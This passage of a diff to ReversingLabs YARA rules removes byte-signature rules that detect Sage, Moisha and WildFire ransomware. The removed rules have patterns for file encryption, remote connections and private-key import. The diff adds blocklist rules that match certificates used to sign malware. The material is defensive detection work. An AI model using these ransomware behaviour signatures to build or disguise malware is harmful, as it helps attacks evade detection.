-            ?? 48 83 FA ?? 72 ?? 48 8D 14 55 ?? ?? ?? ?? 48 8B 0F 48 81 FA ?? ?? ?? ?? 72 ?? 48
-            83 C2 ?? 4C 8B 41 ?? 49 2B C8 48 8D 41 ?? 48 83 F8 ?? 77 ?? 49 8B C8 E8 ?? ?? ?? ??
-            4C 89 77 ?? 48 C7 47 ?? ?? ?? ?? ?? 66 44 89 37 4C 8D 9C 24 ?? ?? ?? ?? 49 8B 5B ??
-            49 8B 73 ?? 49 8B 7B
-        }
-		$encrypt_files_v2_p1 = {
-            BA ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 8B D8 48 83 F8 ?? 75 ?? 48 8D 8D ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 90 48 8D 05 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 8D 05 ?? ?? ?? ?? 48 89
-            85 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 85 C9 0F 84 ?? ?? ?? ?? 49 8B FA 49 8B D1 4D 85 D2
-            74 ?? 4C 8B C1 4D 2B C1 0F B7 02 66 41 39 04 10 75 ?? 48 83 C2 ?? 48 83 EF ?? 75 ??
-            49 2B CB 48 D1 F9 E9 ?? ?? ?? ?? 48 83 C1 ?? E9 ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48
-            8B CB FF 15 ?? ?? ?? ?? 85 C0 75 ?? 48 8B CB FF 15 ?? ?? ?? ?? 90 48 8D 8D ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 90 48 8D 05 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 8D 05 ?? ?? ?? ??
-            48 89 85 ?? ?? ?? ?? E9 ?? ?? ?? ?? 4C 8B BD ?? ?? ?? ?? B2 ?? 48 8D 4C 24 ?? E8 ??
-            ?? ?? ?? B2 ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 66 0F 6F 05 ?? ?? 0B 00 F3 0F 7F 45 ??
-            48 89 75 ?? 48 89 75 ?? 48 8D 45 ?? 48 89 85 ?? ?? ?? ?? 48 8D 45 ?? 48 89 44 24 ??
-            C6 45 ?? ?? 48 B8 ?? ?? ?? ?? ?? ?? ?? ?? 48 89 45 ?? 48 C7 45 ?? ?? ?? ?? ?? C6 45
-            ?? ?? 48 8D 45 ?? 83 E0 ?? 48 8D 44 05 ?? 48 89 45 ?? 89 75 ?? C7 45 ?? ?? ?? ?? ??
-            48 8D 05 ?? ?? ?? ?? 48 89 44 24 ?? 48 8D 05 ?? ?? ?? ?? 48 89 44 24 ?? 48 8D 05 ??
-            ?? ?? ?? 48 89 44 24 ?? 48 8D 05 ?? ?? ?? ?? 48 89 45 ?? 48 8D 05 ?? ?? ?? ?? 48 89
-            44 24 ?? 48 8D 05 ?? ?? ?? ?? 48 89 44 24 ?? 48 8D 05 ?? ?? ?? ?? 48 89 44 24 ?? 48
-            8D 05 ?? ?? ?? ?? 48 89 45 ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48
-            C7 44 24 ?? ?? ?? ?? ?? 48 C7 44 24 ?? ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 4C
-            8B E8 48 89 44 24 ?? 48 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 48 C7 85 ?? ?? ?? ?? ?? ?? ??
-            ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B F8 48 89 85 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? 49
-        }
-		$encrypt_files_v2_p2 = {
-            8B D5 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? 48 8B D7 48 8D 0D ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 48 C7 44 24 ?? ?? ?? ?? ?? 4C 8B CF 41 B8 ?? ?? ?? ?? 49 8B D5
-            48 8D 4C 24 ?? E8 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? 49 8B D5 48 8B 8D ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 48 8B 8D ?? ?? ?? ?? 48 83 C1 ?? 41 B8 ?? ?? ?? ?? 48 8B D7 E8 ?? ?? ?? ??
-            BF ?? ?? ?? ?? 4C 3B FF 0F 8D ?? ?? ?? ?? F2 0F 10 35 ?? ?? ?? ?? 48 8B FE 49 8B C7
-            48 2B C7 48 99 83 E2 ?? 48 03 C2 48 C1 F8 ?? 4C 8B F0 F2 0F 59 35 ?? ?? ?? ?? 0F 57
-            C0 F2 48 0F 2A C0 F2 0F 59 F0 F2 48 0F 2C CE 48 85 C9 0F 85 ?? ?? ?? ?? 4D 85 FF 0F
-            8E ?? ?? ?? ?? 48 8D 45 ?? 48 89 44 24 ?? 48 8D 54 24 ?? 48 8D 4D ?? E8 ?? ?? ?? ??
-            90 48 8D 35 ?? ?? ?? ?? 48 89 75 ?? 4C 8D 35 ?? ?? ?? ?? 4C 89 75 ?? 48 8D 05 ?? ??
-            ?? ?? 48 89 45 ?? 48 8D 05 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 8D 45 ?? 48 89 44 24
-            ?? 4D 8B CF 45 33 C0 48 8B D3 48 8B 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 49
-            81 FF ?? ?? ?? ?? 0F 8E ?? ?? ?? ?? F2 0F 10 35 ?? ?? ?? ?? 48 8D 45 ?? 48 89 44 24
-            ?? 48 8D 54 24 ?? 48 8D 4D ?? E8 ?? ?? ?? ?? 90 48 8D 05 ?? ?? ?? ?? 48 89 45 ?? 48
-            8D 05 ?? ?? ?? ?? 48 89 45 ?? 48 8D 05 ?? ?? ?? ?? 48 89 45 ?? 48 8D 05 ?? ?? ?? ??
-            48 89 85 ?? ?? ?? ?? 48 8D 45 ?? 48 89 44 24 ?? 4C 8B CF 45 33 C0 48 8B D3 49 8B CE
-            E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 99 48 F7 F9 4C 8B E8 48 85 C0 75 ?? 48 8D 45 ?? 48
-        }
-		$encrypt_files_v2_p3 = {
-            89 44 24 ?? 48 8D 54 24 ?? 48 8D 4D ?? E8 ?? ?? ?? ?? 90 48 8D 35 ?? ?? ?? ?? 48 89
-            75 ?? 4C 8D 35 ?? ?? ?? ?? 4C 89 75 ?? 48 8D 05 ?? ?? ?? ?? 48 89 45 ?? 48 8D 05 ??
-            ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 8D 45 ?? 48 89 44 24 ?? 4D 8B CF 45 33 C0 48 8B D3
-            48 8B 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 4C 8B 6C 24 ?? E9 ?? ?? ?? ?? 4D 85 F6 0F 8E ??
-            ?? ?? ?? 4D 8B FD 49 C1 E7 ?? 4C 8B A5 ?? ?? ?? ?? 90 48 8D 45 ?? 48 89 44 24 ?? 48
-            8D 54 24 ?? 48 8D 4D ?? E8 ?? ?? ?? ?? 90 48 8D 05 ?? ?? ?? ?? 48 89 45 ?? 48 8D 05
-            ?? ?? ?? ?? 48 89 45 ?? 48 8D 05 ?? ?? ?? ?? 48 89 45 ?? 48 8D 05 ?? ?? ?? ?? 48 89
-            85 ?? ?? ?? ?? 48 8D 45 ?? 48 89 44 24 ?? 41 B9 ?? ?? ?? ?? 4C 8B C7 48 8B D3 49 8B
-            CC E8 ?? ?? ?? ?? 49 03 F5 49 03 FF 49 3B F6 7C ?? 4C 8B A5 ?? ?? ?? ?? 4C 8B 6C 24
-            ?? 48 8D 35 ?? ?? ?? ?? 4C 8D 35 ?? ?? ?? ?? 4C 8D 8D ?? ?? ?? ?? 4C 8B C3 48 8B 95
-            ?? ?? ?? ?? 48 8B 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B CB FF 15 ?? ?? ?? ?? 4D 8B C4
-            48 8D 95 ?? ?? ?? ?? 48 8B 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8B 95 ?? ?? ?? ?? 48
-            85 D2 74 ?? 48 8B FA 33 C0 B9 ?? ?? ?? ?? F3 AA 48 8B CA E8 ?? ?? ?? ?? 90 4D 85 ED
-            74 ?? 49 8B FD 33 C0 B9 ?? ?? ?? ?? F3 AA 49 8B CD E8 ?? ?? ?? ?? 90 48 89 74 24 ??
-            4C 89 74 24
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( ( ( $find_files ) and ( all of ( $find_system_volumes_v1_p* ) ) and ( all of ( $set_default_icon_p* ) ) and ( $cmd_prompt ) and ( $exclude_from_encryption ) and ( $encrypt_files_v1 ) ) or ( ( $find_files ) and ( $cmd_prompt ) and ( $find_system_volumes_v2 ) and ( $drop_ransom_note ) and ( all of ( $encrypt_files_v2_p* ) ) ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Lerges" and pe.signatures [ i ] . serial == "61:6a:52:05:23:85:90:b0:1d:7b:76:1e:44:4e:4a:d9" and 1421452800 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Sage : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_29Be2278113Dd062Eadca32De6B242D0 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Sage ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "81f4c666-93f9-51bb-8dda-431ef7a81b74"
-		date = "2020-06-26"
-		modified = "2020-07-15"
+		id = "a2dfd6e0-4475-537a-859e-126dd4a02af7"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Sage.yara#L1-L77"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L15900-L15916"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "69079b7176050096cdbaaaff30dd0359366b3a6a74e8bc17db348794388f71ba"
+		logic_hash = "3df7afba9eda9022a64647ce2a91119d0bdf6fe5b164a1e82b1819409024fbee"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Sage"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$remote_connection = {
-            83 EC ?? 8B 44 24 ?? 53 55 56 57 8B 7C 24 ?? 8B 77 ?? 50 E8 ?? ?? ?? ?? 8B 4C 24 ??
-            8B D8 51 89 5C 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 89 44 24
-            ?? C7 44 24 ?? ?? ?? ?? ?? 89 77 ?? FF 15 ?? ?? ?? ?? 8B E8 89 6C 24 ?? 85 ED 0F 84
-            ?? ?? ?? ?? 8B 74 24 ?? 6A ?? 56 53 55 FF 15 ?? ?? ?? ?? 8B D8 89 5C 24 ?? 85 DB 0F
-            84 ?? ?? ?? ?? 8B 4C 24 ?? 33 C0 BA ?? ?? ?? ?? 66 3B F2 0F 95 C0 48 25 ?? ?? ?? ??
-            50 6A ?? 6A ?? 6A ?? 51 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 8B F0 85 F6 0F 84 ?? ??
-            ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 56 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ??
-            ?? 6A ?? 56 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8B 1D ?? ?? ?? ?? 8B 2D ?? ?? ?? ?? 8B FF
-            8D 54 24 ?? 52 56 FF D3 8D 44 24 ?? 50 8B 44 24 ?? 50 50 57 E8 ?? ?? ?? ?? 83 C4 ??
-            50 56 FF D5 85 C0 0F 84 ?? ?? ?? ?? 83 7C 24 ?? ?? 75 ?? 6A ?? 8D 4C 24 ?? 51 8D 54
-            24 ?? 52 6A ?? 68 ?? ?? ?? ?? 56 C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? FF
-            15 ?? ?? ?? ?? 8B 44 24 ?? 89 44 24 ?? 8B 5C 24 ?? 8B 6C 24 ?? 56 FF 15 ?? ?? ?? ??
-            53 FF 15 ?? ?? ?? ?? 55 FF 15 ?? ?? ?? ?? 8B 5C 24 ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ??
-            83 C4 ?? 8B 44 24 ?? 5F 5E 5D 5B 85 C0 74 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 04 24 83
-            C4 ?? C3 57 E8 ?? ?? ?? ?? 83 C4
-        }
-		$encrypt_files = {
-            83 EC ?? 53 8B 1D ?? ?? ?? ?? 55 8B 6C 24 ?? 56 57 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68
-            ?? ?? ?? ?? 8D 7D ?? 57 FF D3 8B F0 83 FE ?? 74 ?? 8D 44 24 ?? 50 56 FF 15 ?? ?? ??
-            ?? 89 44 24 ?? 3D ?? ?? ?? ?? 0F 87 ?? ?? ?? ?? 83 7C 24 ?? ?? 0F 85 ?? ?? ?? ?? 8B
-            4C 24 ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 51 FF D3 8B D8 83 FB ?? 75 ??
-            56 FF 15 ?? ?? ?? ?? 5F 5E 5D B8 ?? ?? ?? ?? 5B 83 C4 ?? C3 8B 54 24 ?? 6A ?? 52 57
-            56 53 E8 ?? ?? ?? ?? 83 C4 ?? 56 8B 35 ?? ?? ?? ?? 8B E8 FF D6 53 FF D6 85 ED 79 ??
-            8B 44 24 ?? 50 FF 15 ?? ?? ?? ?? 5F 5E 8B C5 5D 5B 83 C4 ?? C3 57 E8 ?? ?? ?? ?? 8B
-            F0 56 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 57 8B D8 FF 15 ?? ?? ?? ?? 8B 4C 24 ??
-            6A ?? 53 51 EB ?? 8B 4C 24 ?? BA ?? ?? ?? ?? 3B 55 ?? 1B C0 83 C0 ?? 50 51 57 56 56
-            E8 ?? ?? ?? ?? 83 C4 ?? 56 8B D8 FF 15 ?? ?? ?? ?? 85 DB 79 ?? 5F 5E 5D 8B C3 5B 83
-            C4 ?? C3 57 E8 ?? ?? ?? ?? 8B F0 56 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 8B
-            D8 53 57 FF 15 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 5F 5E 5D 33
-            C0 5B 83 C4 ?? C3
-        }
-		$find_files = {
-            53 55 8B 2D ?? ?? ?? ?? 56 57 33 FF 57 57 FF D5 8B F0 85 F6 74 ?? 85 FF 74 ?? 57 E8
-            ?? ?? ?? ?? 83 C4 ?? 8D 44 36 ?? 50 6A ?? 8B DE E8 ?? ?? ?? ?? 83 C4 ?? 8B F8 57 56
-            FF D5 8B F0 3B DE 72 ?? 66 83 3F ?? 8B DF 0F 84 ?? ?? ?? ?? 8B 6C 24 ?? 53 8B FB FF
-            15 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 8D 5C 43 ?? FF D6 85 C0 74 ?? 68
-            ?? ?? ?? ?? 57 FF D6 85 C0 74 ?? 57 FF 15 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B C8 D3 E2 F6
-            C2 ?? 74 ?? 6A ?? 6A ?? E8 ?? ?? ?? ?? 57 8B F0 E8 ?? ?? ?? ?? 6A ?? 89 06 8D 46 ??
-            6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 4E ?? 51 C7 46 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ??
-            8D 56 ?? 52 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 56 55 89 46 ?? E8 ?? ?? ??
-            ?? 83 C4 ?? 66 83 3B ?? 0F 85 ?? ?? ?? ?? 5F 5E 5D 5B C3
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( $encrypt_files ) and ( $remote_connection )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BLADES" and pe.signatures [ i ] . serial == "29:be:22:78:11:3d:d0:62:ea:dc:a3:2d:e6:b2:42:d0" and 1536883200 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Moisha : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_05F70A557Afd4A443F44D0Baf0Bc8C60 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Moisha ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "c72f654f-955e-5ff6-ac91-19fbb858265c"
-		date = "2022-10-11"
-		modified = "2022-10-11"
+		id = "9ce5b6c7-fede-508f-a7d0-f9d0b8838645"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/ByteCode.MSIL.Ransomware.Moisha.yara#L1-L86"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L15918-L15934"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "89cefbbb8ec722216721bb43eb14cc33fcd4671585051359a06b62236cbf3a6c"
+		logic_hash = "3945f515b65ca3ffb6c2b64c884bb2790d703a277e1a5ba128c81bc63ed20a25"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Moisha"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$find_files_p1 = {
-            73 ?? ?? ?? ?? 0A 02 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 0B 2B ?? 07 6F ?? ?? ?? ?? 0C 08 28
-            ?? ?? ?? ?? 2D ?? 06 08 6F ?? ?? ?? ?? 07 6F ?? ?? ?? ?? 2D ?? DE ?? 07 2C ?? 07 6F ??
-            ?? ?? ?? DC DE ?? 26 DE ?? 06 2A
-        }
-		$find_files_p2 = {
-            02 28 ?? ?? ?? ?? 39 ?? ?? ?? ?? 02 28 ?? ?? ?? ?? 0A 06 6F ?? ?? ?? ?? 6F ?? ?? ?? ??
-            0B 2B ?? 07 6F ?? ?? ?? ?? 0C 08 6F ?? ?? ?? ?? 0D 03 09 6F ?? ?? ?? ?? 04 2C ?? 04 09
-            6F ?? ?? ?? ?? 07 6F ?? ?? ?? ?? 2D ?? DE ?? 07 2C ?? 07 6F ?? ?? ?? ?? DC 06 6F ?? ??
-            ?? ?? 6F ?? ?? ?? ?? 13 ?? 2B ?? 11 ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 6F ?? ?? ?? ?? 03 04
-            28 ?? ?? ?? ?? DE ?? 26 DE ?? 11 ?? 6F ?? ?? ?? ?? 2D ?? DE ?? 11 ?? 2C ?? 11 ?? 6F ??
-            ?? ?? ?? DC 02 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 03 11 ?? 6F ?? ?? ?? ?? 04 2C ?? 04
-            11 ?? 6F ?? ?? ?? ?? 2A
-        }
-		$find_files_p3 = {
-            73 ?? ?? ?? ?? 0A 06 03 7D ?? ?? ?? ?? 06 04 7D ?? ?? ?? ?? 06 05 7D ?? ?? ?? ?? 02 28
-            ?? ?? ?? ?? 39 ?? ?? ?? ?? 06 02 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 7D ?? ?? ?? ?? 06 7B ??
-            ?? ?? ?? 2C ?? 06 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 16 31 ?? 06 7B ?? ?? ?? ?? 2C ?? 06 FE
-            06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 73 ?? ?? ?? ?? 0B 07 17 6F ?? ?? ?? ?? 07 17 6F ?? ?? ??
-            ?? 7E ?? ?? ?? ?? 07 6F ?? ?? ?? ?? 07 6F ?? ?? ?? ?? DE ?? 26 DE ?? 02 28 ?? ?? ?? ??
-            28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 0C 2B ?? 12 ?? 28 ?? ?? ?? ?? 0D 09 6F ?? ?? ?? ?? 06 7B
-            ?? ?? ?? ?? 06 7B ?? ?? ?? ?? 06 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? DE ?? 26 DE ?? 12 ?? 28
-            ?? ?? ?? ?? 2D ?? DE ?? 12 ?? FE 16 ?? ?? ?? ?? 6F ?? ?? ?? ?? DC 2A
-        }
-		$import_priv_key = {
-            02 73 ?? ?? ?? ?? 13 ?? 11 ?? 73 ?? ?? ?? ?? 13 ?? 16 13 ?? 16 13 ?? 16 13 ?? 11 ?? 6F
-            ?? ?? ?? ?? 13 ?? 11 ?? 20 ?? ?? ?? ?? 33 ?? 11 ?? 6F ?? ?? ?? ?? 26 2B ?? 11 ?? 20 ??
-            ?? ?? ?? 33 ?? 11 ?? 6F ?? ?? ?? ?? 26 2B ?? 28 ?? ?? ?? ?? 73 ?? ?? ?? ?? 7A 11 ?? 6F
-            ?? ?? ?? ?? 13 ?? 11 ?? 20 ?? ?? ?? ?? 2E ?? 28 ?? ?? ?? ?? 73 ?? ?? ?? ?? 7A 11 ?? 6F
-            ?? ?? ?? ?? 13 ?? 11 ?? 2C ?? 28 ?? ?? ?? ?? 73 ?? ?? ?? ?? 7A 11 ?? 28 ?? ?? ?? ?? 13
-            ?? 11 ?? 11 ?? 6F ?? ?? ?? ?? 0A 11 ?? 28 ?? ?? ?? ?? 13 ?? 11 ?? 11 ?? 6F ?? ?? ?? ??
-            0B 11 ?? 28 ?? ?? ?? ?? 13 ?? 11 ?? 11 ?? 6F ?? ?? ?? ?? 0C 11 ?? 28 ?? ?? ?? ?? 13 ??
-            11 ?? 11 ?? 6F ?? ?? ?? ?? 0D 11 ?? 28 ?? ?? ?? ?? 13 ?? 11 ?? 11 ?? 6F ?? ?? ?? ?? 13
-            ?? 11 ?? 28 ?? ?? ?? ?? 13 ?? 11 ?? 11 ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 28 ?? ?? ?? ?? 13
-            ?? 11 ?? 11 ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 28 ?? ?? ?? ?? 13 ?? 11 ?? 11 ?? 6F ?? ?? ??
-            ?? 13 ?? 12 ?? FE 15 ?? ?? ?? ?? 12 ?? 06 7D ?? ?? ?? ?? 12 ?? 07 7D ?? ?? ?? ?? 12 ??
-            08 7D ?? ?? ?? ?? 12 ?? 09 7D ?? ?? ?? ?? 12 ?? 11 ?? 7D ?? ?? ?? ?? 12 ?? 11 ?? 7D ??
-            ?? ?? ?? 12 ?? 11 ?? 7D ?? ?? ?? ?? 12 ?? 11 ?? 7D ?? ?? ?? ?? 11 ?? 13 ?? DE ?? 11 ??
-            6F ?? ?? ?? ?? DC 11 ?? 2A
-        }
-		$encrypt_files = {
-            20 ?? ?? ?? ?? 8D ?? ?? ?? ?? 0A 14 0B 14 0C 16 0D 20 ?? ?? ?? ?? 13 ?? 03 19 17 1D 28
-            ?? ?? ?? ?? 0B 03 19 18 1D 28 ?? ?? ?? ?? 0C 02 7B ?? ?? ?? ?? 08 17 6F ?? ?? ?? ?? 13
-            ?? 07 06 16 06 8E 69 6F ?? ?? ?? ?? 13 ?? 11 ?? 16 31 ?? 11 ?? 06 16 11 ?? 6F ?? ?? ??
-            ?? 11 ?? 6F ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 04 11 ?? 6F ?? ?? ?? ?? 04 6F ?? ?? ?? ??
-            13 ?? 11 ?? 8E 69 13 ?? 11 ?? 28 ?? ?? ?? ?? 13 ?? 08 08 6F ?? ?? ?? ?? 16 6F ?? ?? ??
-            ?? 26 08 11 ?? 16 11 ?? 8E 69 6F ?? ?? ?? ?? 08 11 ?? 16 11 ?? 8E 69 6F ?? ?? ?? ?? 08
-            6F ?? ?? ?? ?? 17 0D DE ?? 11 ?? 2C ?? 11 ?? 6F ?? ?? ?? ?? DC DE ?? 13 ?? DE ?? 07 2C
-            ?? 07 6F ?? ?? ?? ?? 08 2C ?? 08 6F ?? ?? ?? ?? 09 26 DC 2A
-        }
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Yu Bao" and pe.signatures [ i ] . serial == "05:f7:0a:55:7a:fd:4a:44:3f:44:d0:ba:f0:bc:8c:60" and 1477440000 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_4E0665D61997072294A70C662F72Eae3 : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "1370a3b5-a254-5197-ac85-5b33e8d9fa38"
+		date = "2020-08-05"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L15936-L15952"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
+		logic_hash = "f07cdfd522db0a92fe1dba30f158b2c89bb5424bdcdfda50ae42fcfddeac19ba"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_p* ) ) and ( $import_priv_key ) and ( $encrypt_files )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Yuanyuan Zhang" and pe.signatures [ i ] . serial == "4e:06:65:d6:19:97:07:22:94:a7:0c:66:2f:72:ea:e3" and 1474502400 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Wildfire : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_74702Dff5D4056B847D009A2265Fb1B3 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects WildFire ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "0c44f017-703c-5db7-b777-62fcd181af9a"
-		date = "2021-08-12"
-		modified = "2021-08-12"
+		id = "55f1e321-ce70-519a-9a39-4278162edbef"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/ByteCode.MSIL.Ransomware.WildFire.yara#L1-L77"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L15954-L15970"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "d3be2eac7967853aae6e1317d9c22d95a3dc4b3e5bf8acbe97a7bbeabc9eab38"
+		logic_hash = "8acc57bbf334a48043dbee6fab7b7a54a44801b2ccd0ccd9d14194689c75c021"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "WildFire"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$encrypt_files = {
-            00 02 19 17 73 ?? ?? ?? ?? 0A 1B 8D ?? ?? ?? ?? 25 16 02 16 02 [5-10] 6F ?? ?? ?? ??
-            6F ?? ?? ?? ?? A2 25 17 [5-10] A2 25 18 7E ?? ?? ?? ?? A2 25 19 [5-10] A2 25 1A 02 02
-            [5-10] 6F ?? ?? ?? ?? 17 D6 6F ?? ?? ?? ?? A2 28 ?? ?? ?? ?? 0B 07 [5-10] 28 ?? ?? ??
-            ?? 1A 18 73 ?? ?? ?? ?? 0C 08 21 00 00 00 00 00 00 00 00 6F ?? ?? ?? ?? 20 ?? ?? ?? ??
-            8D ?? ?? ?? ?? 0D 21 00 00 00 00 00 00 00 00 13 ?? 06 6F ?? ?? ?? ?? 13 ?? 73 ?? ?? ??
-            ?? 13 ?? 08 11 ?? 7E ?? ?? ?? ?? 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 17 73 ?? ?? ?? ?? 13 ??
